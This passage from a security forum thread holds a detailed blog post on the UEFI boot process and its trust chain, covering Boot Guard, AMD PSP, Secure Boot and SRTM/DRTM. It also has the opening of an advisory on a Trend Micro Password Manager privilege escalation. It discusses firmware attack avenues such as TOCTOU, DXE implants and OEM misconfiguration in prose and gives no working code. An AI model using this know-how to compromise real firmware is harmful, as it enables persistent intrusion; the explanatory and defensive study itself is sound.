Intel's Boot Guard. The main difference seems to be that the Root-of-Trust is rooted in the Platform Security Processor (PSP), which fills both the role of Intel's CSME and the ACM. The processor itself is ARM-Cortex-based and sits on the CPU die itself (and not in the PCH as in Intel's case). The PSP firmware is still delivered on the flash; it has its own BL (bootloader) which is verified from the PSP on-die ROM, analogous to CSME's Bringup stage. The PSP will then verify the initial UEFI code before releasing the host CPU from reset. AMD also doesn't speak about IBB/OBB; rather they talk about 'segments', each responsible for verifying the next segment.
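The measurement side of this is easy to demystify: TPM PCRs can't be written, only extended, with PCR_new = H(PCR_old || measurement). A short simulation of SHA-256 PCR extension (the stage names are invented); note that the final value depends on both the contents and the order of every measurement, which is what makes the single register attestable:

```python
import hashlib

def extend(pcr, component):
    """Fold a component's digest into a PCR, TPM 2.0 SHA-256 bank style."""
    measurement = hashlib.sha256(component).digest()
    return hashlib.sha256(pcr + measurement).digest()

pcr0 = bytes(32)  # PCRs reset to all zeroes
for stage in (b"SEC+PEI (IBB)", b"DXE (OBB)", b"boot manager"):
    pcr0 = extend(pcr0, stage)
print(pcr0.hex())
```

An attester who knows the expected stages can recompute the chain and compare it against a signed TPM quote; any substituted or reordered component produces a different final PCR value.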
SEC

Ok, ok, we're at Genesis for real now! But wait (again)! What's this IBB (Initial Boot Block) thing? Wasn't the SEC phase the start of it all (sans the actual start of it all, as above)? All these terms aren't confusing enough. At all. I purposely didn't open at the top with a 'top down' view of the boot verification flow - instead opting to explain organically as we move forward. We have, however, discussed the initial stage of Verified Boot. We now understand how trust is established in this IBB block (or first segment). We can quickly recap the general Verified Boot flow: in short, as we have already established, the ACM (which is Intel's code) verifies the IBB (OEM code). The IBB as CDI will be responsible for verifying the OBB (OEM Boot Block) UDI to transform it into a CDI. The OBB then verifies the next code to run (which is usually the boot manager or other optional 3rd party EFI images) - as part of UEFI Secure Boot. So in terms of verification (with the help of the CSME): uCode->ACM->IBB->OBB->whatever's-next. Generally, the IBB encapsulates the SEC + Pre-EFI Initialization (PEI) phases - the PEI FV (Firmware Volume). (The SEC phase is named as such despite having relatively little to do with actual 'security'.) With no Verified Boot, the CPU will start executing the SEC phase from the legacy reset vector (0xfffffff0), directly off the SPI flash (the hardware has the necessary IP to implement a transparent memory-mapped SPI interface to the flash). At the reset vector, the platform can execute only in a constrained state. For example, it has no concept of crucial components such as RAM. Kind of an issue if we want to execute meaningful higher-level code. It is also in Real Mode. As such, one of the first jobs of SEC is to switch the processor to Protected Mode (because legacy modes aren't the funnest). It will also configure the memory available in the CPU caches into a CAR (Cache-as-RAM) 'no-eviction mode' - via MTRRs.
This mode will ensure that reads/writes to the CPU caches do not result in an attempt to evict lines to primary memory external to the chip. The constraint created here is that the available memory is limited to that available in the CPU caches, but this is usually quite large nowadays; the recent Ryzen 3900X chip that I acquired has a total of 70MB - more than sufficient for holding the entire firmware image in memory + extra for execution environment usages (data regions, heaps + stacks); not that this is actually done. Another important function of SEC is to perform the initial handling of the various sleep states that the machine could have resumed from and direct to alternate boot paths accordingly. This is absolutely out of scope for our discussion (super complex) - as is anything to do with ACPI; it's enough to know that it happens (and has a measurable impact on platform security + attack surface). And because we want to justify the 'SEC' phase naming, uCode updates can be applied here. When executing SEC from a Verified Boot flow (i.e. after ACM verification of the IBB), it seems to me that the CPU caches must already have been set up as CAR (perhaps by the ACM?); in an ideal world the entire IBB should already be cache-memory resident (if it was read directly off the flash after passing verification, we'd potentially have a physical-attack TOCTOU security issue on our hands). I'd hope that the same is true on the AMD side. After SEC is complete, platform initialization continues with the Pre-EFI Initialization phase (PEI). Each phase requires a hand-off to the next phase which includes a set of structured information necessary for the subsequent phase to do its job. In the case of SEC, this information includes necessary vectors detailing where the CAR is located, where the BFV (Boot Firmware Volume) can be found mapped into a processor-accessible memory region and some other bits and bobs.
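As an aside on that memory-mapped flash arrangement: the image is mapped so its last byte ends at the top of the 32-bit address space, which is how the legacy reset vector (0xfffffff0) lands inside the firmware. A sketch of the address math, assuming (simplistically) that the entire image is mapped rather than the chipset's usual windowing:

```python
def flash_offset(phys_addr, flash_size):
    """Map a physical address in the flash window to a file offset,
    assuming the image's last byte sits at 0xFFFFFFFF."""
    distance_from_top = 0x1_0000_0000 - phys_addr
    assert distance_from_top <= flash_size, "address below the mapped window"
    return flash_size - distance_from_top

# On a 16 MiB image, the reset vector is 16 bytes from the end of the file.
print(hex(flash_offset(0xFFFFFFF0, 16 * 1024 * 1024)))
```

This is why, when you open a raw SPI dump in a hex editor, the first instructions the CPU ever runs sit 16 bytes before the end of the file.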
PEI

PEI is comprised of the PEI Foundation - a binary that has no code dependencies - and a set of Pre-EFI Initialization Modules (PEIMs). The PEI Foundation (PeiCore) is responsible for making sure PEIMs can communicate with each other (via the PPI - PEIM-to-PEIM Interface) and for providing a small runtime environment with a number of further services (exposed via the PEI Services Table) to those PEIMs. It also dispatches (invokes/executes) the PEIMs themselves. The PEIMs are responsible for all aspects of base-hardware initialization, such as primary memory configuration (such that main RAM becomes available), CPU + IO initialization, system bus + platform setup and the init of various other features core to the functioning of a modern computing platform (such as the all-important BIOS status code). Some of the code running here is decidedly non-trivial (for example, I've seen a USB stack) and I've observed that there are more PEIMs than one would reasonably think there should be; on my MSI X570 platform I count ~110 modules! I'd like to briefly call out the PEIM responsible for main memory discovery and initialization. When it returns to the PEI Foundation, it provides information about the newly-available primary system memory. The PEI Foundation must now switch from the 'temporary' CAR memory to the main system memory. This must be done with care (from a security perspective). PEIMs can also choose to populate sequential data structures called HOBs (Hand-Off Blocks) which include information that may be necessary to consuming code further down the boot stack (e.g. in phases post-PEI). These HOBs must be resident in main system memory. Before we progress to the next phase, I'd like to return to our topic of trust. Theoretically, the PEI Foundation is expected to dispatch a verification check before executing any PEIM. The framework itself has no notion of how to establish trust, so it should delegate this to a set of PPIs (potentially serviced by other PEIMs).
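Those HOBs are simple to picture: a contiguous list of length-prefixed blocks, each starting with EFI_HOB_GENERIC_HEADER (UINT16 HobType, UINT16 HobLength, UINT32 Reserved) and terminated by a HOB of type 0xFFFF (END_OF_HOB_LIST). A toy walker over a synthetic list - the non-terminator type value and payload below are made up for illustration:

```python
import struct

END_OF_HOB_LIST = 0xFFFF  # terminator HobType per the PI spec

def walk_hobs(blob):
    """Collect (HobType, payload) pairs from a packed HOB list."""
    hobs, off = [], 0
    while True:
        hob_type, hob_len, _reserved = struct.unpack_from("<HHI", blob, off)
        if hob_type == END_OF_HOB_LIST:
            return hobs
        hobs.append((hob_type, blob[off + 8 : off + hob_len]))
        off += hob_len

# Synthetic list: one HOB carrying 8 bytes of payload, then the terminator.
fake = struct.pack("<HHI", 0x0003, 16, 0) + b"\x11" * 8 \
     + struct.pack("<HHI", END_OF_HOB_LIST, 8, 0)
print(walk_hobs(fake))
```

The real structures are typed (memory allocation, resource descriptor, GUID extension, etc.), but the framing is exactly this: DXE later walks the same list to learn everything PEI discovered.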
There is a chicken-and-egg issue here: if some component of the PEI phase should be responsible for establishing trust, what establishes trust in that component? This is all meaningless unless the PEI itself (or a subsection of it) is trusted. As a reminder, though, we know that the IBB - which encapsulates the SEC+PEI (hopefully unless the OEM has messed this up) is verified and is trusted (CDI) when running under Verified Boot, therefore the PEI doesn't necessarily need to perform its own integrity checks on various PEIMs; or does it? Here you can see the haze that becomes a source of confusion for OEMs implementing security around this - with all the good will in the world. If the IBB is memory resident and has been verified by the ACM and is untouched since verification, a shortcut can be taken and the PEI verifying PEIMs seems superfluous. If, however, PEIMs are loaded from flash as and when they're needed, they need to be verified before execution and that verification needs to be rooted in the TCB already established by the ACM (i.e. the initial code that it verified as the IBB). If PEI code is XIP (eXecuted In Place), things are even worse and physical TOCTOU attacks become a sad reality. Without a TCB established via a verified boot mechanism the PEI is self-trusted and becomes the Root-of-Trust. This is referred to as the CRTM - the Core Root of Trust for Measurement (the importance of which will become apparent when we eventually speak about Secure Boot). The PEI is measured into the TPM in PCR0 and can be attested to later on, but without a previously-established TCB, any old Joe can just replace the thing; remotely if the OEM has messed up the secure firmware update procedure or left the SPI flash writable. Oy. Our flow is now almost ready to exit the PEI phase with the platform set up and have some 'full-fledged' code! Next up is the DXE (Driver eXecution Environment) phase. Before entering DXE, PEI must perform two important tasks. 
The first is to verify the DXE. In our Intel parlance, PEI (or at least the part of it responsible for trust) was part of the IBB that was verified by the Boot Guard ACM. Intel's Boot Guard / AMD's HVB code has already exited the picture once the IBB (Intel)/1st segment (AMD) starts executing and the OEM is expected to take over the security flow from here (eh). PEI must therefore have some component to verify and measure the OBB/next phase (of which DXE is a part). On platforms that support Boot Guard, a PEIM (which may be named BootGuardPei in your firmware) is responsible for doing this work. This PEIM registers a callback procedure to be called when the PEI phase is ready to exit. When it is called, it is expected to bring the OBB resident and verify it. The same discussion applies to the DXE as did to the PEI above regarding verification of various DXE modules (we'll discuss what these are shortly). If the entire OBB is brought resident and verified by this PEIM, the OEM may decide to shortcut verification of each DXE module. Alternatively a part of DXE can be made CDI and that can be used to verify each module prior to execution (bringing with it all the security considerations already mentioned). Either way; yet another part of the flow where the OEM can mess things up. The second, and final, task of the PEI is to set up and execute the DXE environment. Anyhoo, let's get right to DXE.

DXE

Similar to PEI, DXE consists of a DXE Foundation - the DXE Core + DXE driver dispatcher (DxeCore) - and a number of DXE drivers. We can go down an entire rabbit hole around what's available to, and exposed by, the DXE phase; yet another huge collection of code (this time I count ~240 modules in my firmware). But as we're not writing a book, I'll leave it up to whoever's interested to delve further as homework. The DXE Foundation has access to the various PEIM-populated HOBs.
These HOBs include all the information necessary to have the entire DXE phase function independently of what has come before it. Therefore, nothing (other than the HOB list) has to persist once DXE Core is up and running and DXE can happily blast over whatever is left of PEI in memory. The DXE Dispatcher will discover and execute the DXE drivers available in the relevant firmware volume. These drivers are responsible for higher-level platform initialization and services. Some examples include the setting up of System Management Mode (SMM), higher-level firmware drivers such as network, boot disks, thermal management, etc. Similar to what the PEI Framework does for PEIMs, the DXE Framework exposes a number of services to DXE drivers (via the DXE Services Table). These drivers are able to register (and lookup+consume) various architectural protocols covering higher-level constructs such as storage, security, RTC, etc. DXE Core is also responsible for populating the EFI System Table which includes pointers to the EFI Boot Services Table, EFI Runtime Services Table and EFI Configuration Table. The EFI Configuration Table contains a set of GUID/pointer pairs that correspond to various vendor tables identified by their GUIDs. It's not really necessary to delve into these for the purposes of our discussion:

typedef struct {
  ///
  /// The 128-bit GUID value that uniquely identifies the system configuration table.
  ///
  EFI_GUID   VendorGuid;
  ///
  /// A pointer to the table associated with VendorGuid.
  ///
  VOID       *VendorTable;
} EFI_CONFIGURATION_TABLE;

The EFI Runtime Services Table contains a number of services that are invokable for the duration of system runtime:

typedef struct {
  ///
  /// The table header for the EFI Runtime Services Table.
  ///
  EFI_TABLE_HEADER                Hdr;

  //
  // Time Services
  //
  EFI_GET_TIME                    GetTime;
  EFI_SET_TIME                    SetTime;
  EFI_GET_WAKEUP_TIME             GetWakeupTime;
  EFI_SET_WAKEUP_TIME             SetWakeupTime;

  //
  // Virtual Memory Services
  //
  EFI_SET_VIRTUAL_ADDRESS_MAP     SetVirtualAddressMap;
  EFI_CONVERT_POINTER             ConvertPointer;

  //
  // Variable Services
  //
  EFI_GET_VARIABLE                GetVariable;
  EFI_GET_NEXT_VARIABLE_NAME      GetNextVariableName;
  EFI_SET_VARIABLE                SetVariable;

  //
  // Miscellaneous Services
  //
  EFI_GET_NEXT_HIGH_MONO_COUNT    GetNextHighMonotonicCount;
  EFI_RESET_SYSTEM                ResetSystem;

  //
  // UEFI 2.0 Capsule Services
  //
  EFI_UPDATE_CAPSULE              UpdateCapsule;
  EFI_QUERY_CAPSULE_CAPABILITIES  QueryCapsuleCapabilities;

  //
  // Miscellaneous UEFI 2.0 Service
  //
  EFI_QUERY_VARIABLE_INFO         QueryVariableInfo;
} EFI_RUNTIME_SERVICES;

These runtime services are utilized by the OS to perform UEFI-level tasks. Some of the functionality provided by the vectors available in the table above is mostly self-explanatory, e.g. the variable services are used to read/write EFI variables - usually stored in NV (non-volatile) memory - i.e. on the flash. (The Windows Boot Configuration Data (BCD) makes use of this interface for storing variable boot-time settings, for example.) The EFI Boot Services Table contains a number of services that are invokable by EFI applications until such time as ExitBootServices() - itself an entry in this table - is called:

typedef struct {
  ///
  /// The table header for the EFI Boot Services Table.
  ///
  EFI_TABLE_HEADER                  Hdr;

  //
  // Task Priority Services
  //
  EFI_RAISE_TPL                     RaiseTPL;
  EFI_RESTORE_TPL                   RestoreTPL;

  //
  // Memory Services
  //
  EFI_ALLOCATE_PAGES                AllocatePages;
  EFI_FREE_PAGES                    FreePages;
  EFI_GET_MEMORY_MAP                GetMemoryMap;
  EFI_ALLOCATE_POOL                 AllocatePool;
  EFI_FREE_POOL                     FreePool;

  //
  // Event & Timer Services
  //
  EFI_CREATE_EVENT                  CreateEvent;
  EFI_SET_TIMER                     SetTimer;
  EFI_WAIT_FOR_EVENT                WaitForEvent;
  EFI_SIGNAL_EVENT                  SignalEvent;
  EFI_CLOSE_EVENT                   CloseEvent;
  EFI_CHECK_EVENT                   CheckEvent;

  //
  // Protocol Handler Services
  //
  EFI_INSTALL_PROTOCOL_INTERFACE    InstallProtocolInterface;
  EFI_REINSTALL_PROTOCOL_INTERFACE  ReinstallProtocolInterface;
  EFI_UNINSTALL_PROTOCOL_INTERFACE  UninstallProtocolInterface;
  EFI_HANDLE_PROTOCOL               HandleProtocol;
  VOID                              *Reserved;
  EFI_REGISTER_PROTOCOL_NOTIFY      RegisterProtocolNotify;
  EFI_LOCATE_HANDLE                 LocateHandle;
  EFI_LOCATE_DEVICE_PATH            LocateDevicePath;
  EFI_INSTALL_CONFIGURATION_TABLE   InstallConfigurationTable;

  //
  // Image Services
  //
  EFI_IMAGE_LOAD                    LoadImage;
  EFI_IMAGE_START                   StartImage;
  EFI_EXIT                          Exit;
  EFI_IMAGE_UNLOAD                  UnloadImage;
  EFI_EXIT_BOOT_SERVICES            ExitBootServices;

  //
  // Miscellaneous Services
  //
  EFI_GET_NEXT_MONOTONIC_COUNT      GetNextMonotonicCount;
  EFI_STALL                         Stall;
  EFI_SET_WATCHDOG_TIMER            SetWatchdogTimer;

  //
  // DriverSupport Services
  //
  EFI_CONNECT_CONTROLLER            ConnectController;
  EFI_DISCONNECT_CONTROLLER         DisconnectController;

  //
  // Open and Close Protocol Services
  //
  EFI_OPEN_PROTOCOL                 OpenProtocol;
  EFI_CLOSE_PROTOCOL                CloseProtocol;
  EFI_OPEN_PROTOCOL_INFORMATION     OpenProtocolInformation;

  //
  // Library Services
  //
  EFI_PROTOCOLS_PER_HANDLE          ProtocolsPerHandle;
  EFI_LOCATE_HANDLE_BUFFER          LocateHandleBuffer;
  EFI_LOCATE_PROTOCOL               LocateProtocol;
  EFI_INSTALL_MULTIPLE_PROTOCOL_INTERFACES    InstallMultipleProtocolInterfaces;
  EFI_UNINSTALL_MULTIPLE_PROTOCOL_INTERFACES  UninstallMultipleProtocolInterfaces;

  //
  // 32-bit CRC Services
  //
  EFI_CALCULATE_CRC32               CalculateCrc32;

  //
  // Miscellaneous Services
  //
  EFI_COPY_MEM                      CopyMem;
  EFI_SET_MEM                       SetMem;
  EFI_CREATE_EVENT_EX
    CreateEventEx;
} EFI_BOOT_SERVICES;

These services are crucial for getting any OS boot loader up and running. Trying to stick to the format of explaining the boot process via the security flow, we now need to speak about Secure Boot. As 'Secure Boot' is often paraded around as the be-all and end-all of boot-time security, if you take anything away from reading this, please let it be an understanding that Secure Boot is not all that is necessary for trusted platform execution. It plays a crucial role but should not be seen as a technology that can be considered robust in a security sense without other addendum technologies (such as Measured+Verified Boot). Simply put, Secure Boot is this: prior to execution of any EFI application, if Secure Boot is enabled, the relevant Secure Boot-implementing DXE driver (SecureBootDXE on my machine) must verify the executable image before launching that application. This requires a number of cryptographic keys:

- PK - Platform Key: The platform 'owner' (alas, usually the OEM) issues a key which is written into a secure EFI variable (these variables are only updatable if the update is attempted by an entity that can prove its ownership over the variable. We won't discuss how this works here; just know: the security around this can be meh). This key must only be used to verify the KEK
- KEK - Key Exchange Key: One or more keys that are signed by the PK - used to update the current signature databases
- dbx - Forbidden Signature Database: Database of entries (keys, signatures or hashes) that identify EFI executables that are blacklisted (i.e. forbidden from executing). The database is signed by the KEK
- db - Signature Database: Database of entries (keys, signatures or hashes) that identify EFI executables that are whitelisted.
The database is signed by the KEK
- [Secure firmware update key: Outside the scope of this discussion]

For example, prior to executing any OEM-provided EFI applications or the Windows Boot Manager, the DXE code responsible for Secure Boot must first check that the EFI image either appears verbatim in the db or is signed with a key present in the db. Commercial machines often come with an OEM-provisioned PK and Microsoft's KEK and CA already present in the db (much debate over how fair this is). Important note: Secure Boot is not designed to defend against an attacker with physical access to a machine (keys are, by design, replaceable).

BDS

The DXE phase doesn't perform a formal hand-off to the next phase in the UEFI boot process, the BDS (Boot Device Selection) phase; rather, DXE is still resident and providing both EFI Boot and EFI Runtime services to the BDS (via the tables described above). What happens from here can be slightly different depending on what it is that we're booting (if we're running some simple EFI application as our end goal - we are basically done already). So let's carry on our discussion in terms of Microsoft Windows. As mentioned, when all the necessary DXE drivers have been executed, and the system is now ready to boot an operating system, the DXE code will attempt to launch a boot application. Boot menu entries are specified in EFI variables and EFI boot binaries are usually resident on the relevant EFI system partition. In order to discover + use the system partition, DXE must already (a) have a FAT driver loaded such that it can make sense of the file system (which is FAT-based) and (b) parse the GUID Partition Table (GPT) to discover where the system partition is on disk. The first Windows-related code to run (ignoring any Microsoft-provided PEIMs or DXE drivers) is the Windows Boot Manager (bootmgfw.efi). The Windows Boot Manager is the initial boot loader required to get Windows running.
It uses the EFI Boot-time Service-provided block IO protocol to transact with the disk (such that it doesn't need to mess around with working out how to communicate with the hardware itself). Mainly, it's responsible for selecting the configured Windows boot loader and invoking it (but it does some other stuff like setting up security policies, checking if resuming from hibernation or recovery boot is needed, etc.).

TSL

Directly after BDS is done, we've got the TSL (Transient System Load) phase; a fancy way of describing the phase where the boot loader actually brings up the operating system and tears down the unnecessary parts of DXE. In the Windows world, the Windows Boot Manager will now launch the Windows Boot Loader (winload.efi) - after performing the necessary verification (if Secure Boot is enabled). The Windows Boot Loader is a heftier beast and performs some interesting work. In the simplest - not-caring-about-anything-security-related - flow, winload.efi is responsible for initializing the execution environment such that the kernel can execute. This includes enabling paging and setting up the kernel's page tables, dispatch tables, stacks, etc. It also loads the SYSTEM registry hive (read-only, I believe) and the kernel module itself - ntoskrnl.exe (and once-upon-a-time hal.dll as well). Just before passing control to the NT kernel, winload will call ExitBootServices() to tear down the boot-time services still exposed from DXE (leaving just the runtime services available) and SetVirtualAddressMap() to virtualize the firmware services (i.e. informing the DXE runtime service handler of the relevant virtual address mappings).

Carrying on with our theme of attempting to understand how trusted computing is enabled (now with Windows as the focus), on a machine with Secure Boot enabled, winload will of course only agree to load any images after first ensuring they pass verification policy (and measuring the respective images into the TPM, as necessary).
I'd encourage all Windows 10 users to enable 'Core Isolation' (available in the system Settings). This will enable HVCI (Hypervisor-enforced kernel-mode code integrity) on the system; in turn meaning that the Microsoft Hyper-V hypervisor platform will run, such that VBS (Virtualization-based Security) features enabled by VSM (Virtual Secure Mode) will be available. In this scenario winload is responsible for bringing up the hypervisor, securekernel, etc. but diving into that requires a separate post (and others have done justice to it anyway).

RT

The kernel will now perform its own initialization and set up things just right - loading drivers etc.; taking us to the stage most people identify as being the 'end of boot'. The only EFI services still available to the OS are the EFI Runtime Services, which the OS will invoke as necessary (e.g. when reading/writing UEFI variables, shutdown, etc.). This part of the UEFI life-cycle is termed the RT (RunTime).

SRTM/DRTM and rambling thoughts

We should now have a rudimentary understanding of the general boot flow. I do want to back up a bit though and again discuss the verified boot flow and where the pitfalls can lie. Hopefully one can see how relatively complex this all is, and ensuring that players get everything correct is often a challenge. Everything that we've discussed until now is part of what we term the SRTM (Static Root-of-Trust for Measurement) flow. This basically means that, from the OS's perspective, all parts of the flow up until it, itself, boots form part of the TCB (Trusted Computing Base). Let's dissect this for a moment. The initial trust is rooted in the CPU+chipset vendor. In Intel's case, we have the CPU ROM and the CSME ROM as joint roots-of-trust. Ok, Intel, AMD et al. are pretty well versed in security stuff after all - perhaps we're happy to trust they have done their jobs here (history says not; but it is getting better with time and hey, we've got to trust someone).
But once the ACM verifies the IBB, we have moved responsibility to OEM vendor code. I'll be uncharitable here and say that often this code is godawful from a security perspective. There is a significant amount of code (just count the PEIMs and DXE drivers) sourced from all over the place, and often these folk simply don't have the security expertise to implement things properly. The OEM-owned IBB measures the OEM-owned OBB, which measures the OS bootloader. We might trust the OS vendor to also do good work here (again, not foolproof) but we have this black hole of potential security pitfalls for OEM vendors to collapse into. And if UEFI is compromised, it doesn't matter how good the OS bootloader verification flows are. Basically this thing is only as good as its weakest link; and that, traditionally, has been UEFI.

Let's identify some SRTM pitfalls. Starting with the obvious: if the CPU ROM or CSME/PSP ROMs are compromised, everything falls apart (the same is of course true with DRTM, described below). I wish I could say that there aren't issues here with specific vendors, but that would be disingenuous. Let us assume for now the CPU folk have gotten their act together. We now land ourselves in the IBB or some segment verified by the ACM/PSP. The first pitfall is that the OEM vendor needs to actually present the correct parts of the firmware for verification by the ACM. Sometimes modules are left out and are just happily executed by the PEI (as they've also short-circuited PEIM verification). Worse, the ACM requires an OEM key to verify the IBB (hence why it needs the CSME in the first place) - some OEMs haven't burned in their key properly, or are using test keys, or haven't set the EOM (End of Manufacturing) fuse, allowing carte blanche attacks against this (and even worse, lack of OEM action here can actually lead to these security features being hijacked to protect malicious code itself).
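The chain described above (each stage measures the next before handing over control) is the heart of SRTM. A minimal sketch of that hash chaining in C, using FNV-1a purely as a dependency-free stand-in for the SHA digests a real TPM PCR bank would use:

```c
#include <stdint.h>
#include <string.h>

/* Toy model of TPM-style measurement chaining. Each boot stage folds
 * the next stage's image into a running digest before executing it:
 * pcr' = H(pcr || measurement). FNV-1a is NOT cryptographic; it stands
 * in here only so the sketch has no external dependencies. */

static uint64_t fnv1a(uint64_t seed, const void *data, size_t len)
{
    const uint8_t *p = data;
    uint64_t h = seed ^ 0xcbf29ce484222325ULL; /* offset basis, mixed with seed */
    for (size_t i = 0; i < len; i++) {
        h ^= p[i];
        h *= 0x100000001b3ULL; /* FNV prime */
    }
    return h;
}

/* Extend: the new value depends on both the old value and the new
 * measurement, so a later stage cannot erase or reorder what earlier
 * stages already logged - it can only extend further. */
static uint64_t pcr_extend(uint64_t pcr, const char *measurement)
{
    return fnv1a(pcr, measurement, strlen(measurement));
}
```

Because the final digest commits to every stage and the order they ran in, an attestor comparing it against known-good values catches a tampered IBB or OBB anywhere in the chain - provided, as the text argues, every stage actually performed its measurement honestly.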
OEMs need to be wary about making sure that when PEI switches over to main system memory, a TOCTOU attack isn't opened up by re-reading modules off SPI and assuming they are trusted. Furthermore, for verified boot to work, there needs to be some PEI module responsible for verifying DXE; but if the OEM has stuffed up and the IBB isn't verified properly at all, then this module can be tampered with and the flow falls apart. Oh, and this OEM code could do the whole verification bit correctly and simply do a 'I'll just execute this code-that-failed-verification and ask it to reset the platform because I'll tell it that it, itself, failed verification' (oh yes, this happened). And there are all those complex flows that I haven't spoken about at all - e.g. resuming from sleep states and needing to protect the integrity of saved contexts correctly. Also, just enabling the disparate security features seems beyond some OEMs - even basic ones like 'don't allow arbitrary runtime writes to the flash' are ignored. Getting this correct requires deep knowledge of the space. For example, vendors have traditionally not considered the evil maid attack in scope, and TOCTOU attacks have been demonstrated against the verification of both the IBB and OBB.

Carrying on though, let's assume that PEI is implemented correctly; what about the DXE module responsible for things down the line? Has that been done correctly? Secure Boot has its own complexities, what with its key management and only allowing modification of authenticated UEFI variables by PK owners, etc. etc. I'm not going to go into every aspect of what can go wrong here but honestly we've seen quite a lot of demonstrable issues historically.

(To be clear, above I'm speaking about SRTM in terms of what usually goes on in most Windows-based machines today. There are SRTM schemes that do a lot better there - e.g.
Google's Titan and Microsoft's Cerberus, in which a separate component is interposed between the host/chipset processors and the firmware residing on SPI.)

So folk got together and made an attempt to come up with a way to take the UEFI bits out of the TCB. Of course this code still needs to run; but we don't really want to trust it for the purposes of verifying and loading the operating system. So DRTM (Dynamic Root-of-Trust for Measurement) was invented. In essence, this is a way to supply potentially multiple pieces of post-UEFI code for verification by the folk that we trust more than the folk we trust less - i.e. the CPU/chipset vendors (Intel/AMD et al.). Instead of just relying on the Secure Boot flow, which relies on the OEMs having implemented that properly, we just don't care what UEFI does (it's assumed compromised in the model). Just prior to executing the OS, we execute another ACM via special SENTER/SKINIT instructions (rooted in the CPU Root-of-Trust just like we had with Boot Guard verifying the IBB). This time we ask this ACM to measure a piece of OS-vendor (or other vendor) code called an MLE (Measured Launch Environment) - all measurements extended into PCRs of the TPM, of course, such that we can attest to them later on. This MLE - after verification by the ACM - is now trusted and can measure the various OS components etc. - bypassing trust in EFI.

Now here's my concern: I've heard folk get really excited about DRTM - and rightly so; it's a step forward in terms of security. However I'd like to speak about some potential issues with the 'DRTM solves all' approach. My main concern is that we stop understanding that compromised UEFI can still possibly be damaging to practical security - even in a DRTM-enabled world. SMM is still an area of concern (although there are incoming architectural features that will help address this).
But even disregarding SMM, the general purpose operating systems that most of the world's clients + servers run on were designed in an era before our security field matured. Security has been tacked on for years with increasing complexity. In a practical sense, even our user modes still execute code that is privileged in the sense of being able to effect the exact damage on a targeted system that attackers are happy to live with (not to forget that our kernel modes are pretty permissive as well). Remember, attackers don't care about security boundaries or domains of trust; they just want to do what they need to do.

As an example, in recent history an actor known as Sednit/Strontium achieved a high degree of persistence on machines by installing DXE implants on platforms that hadn't correctly secured programmatic write access to the SPI flash. Enabling Secure Boot is ineffectual, as it only cares about post-DXE; compromised DXE means compromised Secure Boot. Enabling Measured/Verified Boot could *possibly* have helped in this particular case - if we trust the current UEFI code to do its job - but the confidence in that probably isn't high, given that these platform folk didn't even disable write access to the SPI (and we've seen Boot Guard rendered ineffectual via DXE manipulation - something Sednit would have been able to do here). So let us assume that Sednit would have been able to get their DXE modules running even under Verified Boot. Anyway, the firmware implants attacked the system by mounting the primary NTFS partition, writing their malicious code to the drive, messing around with the SYSTEM registry hive to ensure that their service is loaded at early boot and... done! That's all that's necessary to compromise a system such that it can persist over an FnR (Format and Restore).
(BitLocker can also help defend against this particular type of attack in an SRTM flow; but that's assuming that it's enabled in the first place - and the CRTM is doing its job - and it's not configured in an auto-unlock mode.)

Let's take this scenario into a DRTM world. UEFI 'Secure Boot' compromise becomes somewhat irrelevant with DRTM - the MLE can do the OS verification flow; so that's great. An attacker can no longer unmeasurably modify the OS boot manager, boot loader, kernel (code regions, at least), securekernel, or hv with impunity. These are all very good things. But here's the thing: UEFI is untrusted in the DRTM model, so in the threat model we assume that the attacker would be able to run their DXE code - like today. They can do that very same NTFS write to get their user-mode service onto the NTFS volume. Under a default Windows setup - sans a special application control / Device Guard policy - Windows will happily execute that attacker service (code signing is completely ineffectual here - that's a totally broken model for Windows user-mode applications). Honestly though, a machine that enabled a DRTM flow would hopefully enable BitLocker, which should be more effectual here, as I'd expect that the DRTM measurements are required before unsealing the BitLocker decryption key (I'm not exactly sure of the implementation details around this). But I wonder to what extent compromised UEFI could mess around with this flow; perhaps by extending the PCRs itself with the values expected from DRTM measurements, unsealing the key, writing its stuff to the drive, reboot? Or, more complexly, launching its own hypervisor to execute the rest of the Windows boot flow under (perhaps trapping SENTER/SINIT, et al.??). I'd need to give some thought as to what's possible here, but given the complexity surrounding all this it's not out of the realm of possibility that compromised UEFI can still be damaging.
Now, honestly, in terms of something Sednit-like writing an executable to disk, a more restrictive (e.g. state-separated) platform that is discerning about what user- and kernel-mode code it lets run (and with which privileges) might benefit significantly from DRTM - although it seems likely one can effect huge damage on an endpoint via corrupting settings files alone - no code exec required; something like how we view data corruption via DKOM, except this time 'DCM' (Direct Configuration Manipulation)?? from firmware. DRTM is *excellent*; I'm just cautioning against assuming that it's an automatic 'fix-all' today for platform security issues. I feel more industry research around this may be needed to empirically verify the bounds of its merits.

I hope you enjoyed this 'possibly-a-little-more-than-a-primer' view into UEFI boot and some of the trust model that surrounds it. Some hugely important, related things I haven't spoken about include SMM, OROM and secure firmware updates (e.g. Intel BIOS Guard); topics for another time. Please let me know if you found this useful at all (it did take a non-insignificant amount of time to write). Am always happy to receive constructive feedback too. I'd like to end off with a few links to some offensive research work done by some fantastic folk that I've come across over the years - showing what can be done to compromise this flow (some of which I've briefly mentioned above).
If you know of any more resources, please send them my way and I'll happily extend this list: https://conference.hitb.org/hitbsecconf2019ams/materials/D1T1 - Toctou Attacks Against Secure Boot - Trammell Hudson & Peter Bosch.pdf https://github.com/rrbranco/BlackHat2017/blob/master/BlackHat2017-BlackBIOS-v0.13-Published.pdf https://medium.com/@matrosov/bypass-intel-boot-guard-cc05edfca3a9 https://embedi.org/blog/bypassing-intel-boot-guard/ https://www.blackhat.com/docs/us-17/wednesday/us-17-Matrosov-Betraying-The-BIOS-Where-The-Guardians-Of-The-BIOS-Are-Failing.pdf https://2016.zeronights.ru/wp-content/uploads/2017/03/Intel-BootGuard.pdf Sursa: https://depletionmode.com/uefi-boot.html
  24. Trend Micro Password Manager - Privilege Escalation to SYSTEM

August 14th, 2019
Peleg Hadar, Security Researcher, SafeBreach Labs

Introduction

SafeBreach Labs discovered a new vulnerability in Trend Micro Password Manager software. In this post, we will demonstrate how this vulnerability could have been used in order to achieve privilege escalation and persistence by loading an arbitrary unsigned DLL into a service that runs as NT AUTHORITY\SYSTEM.

Trend Micro Password Manager

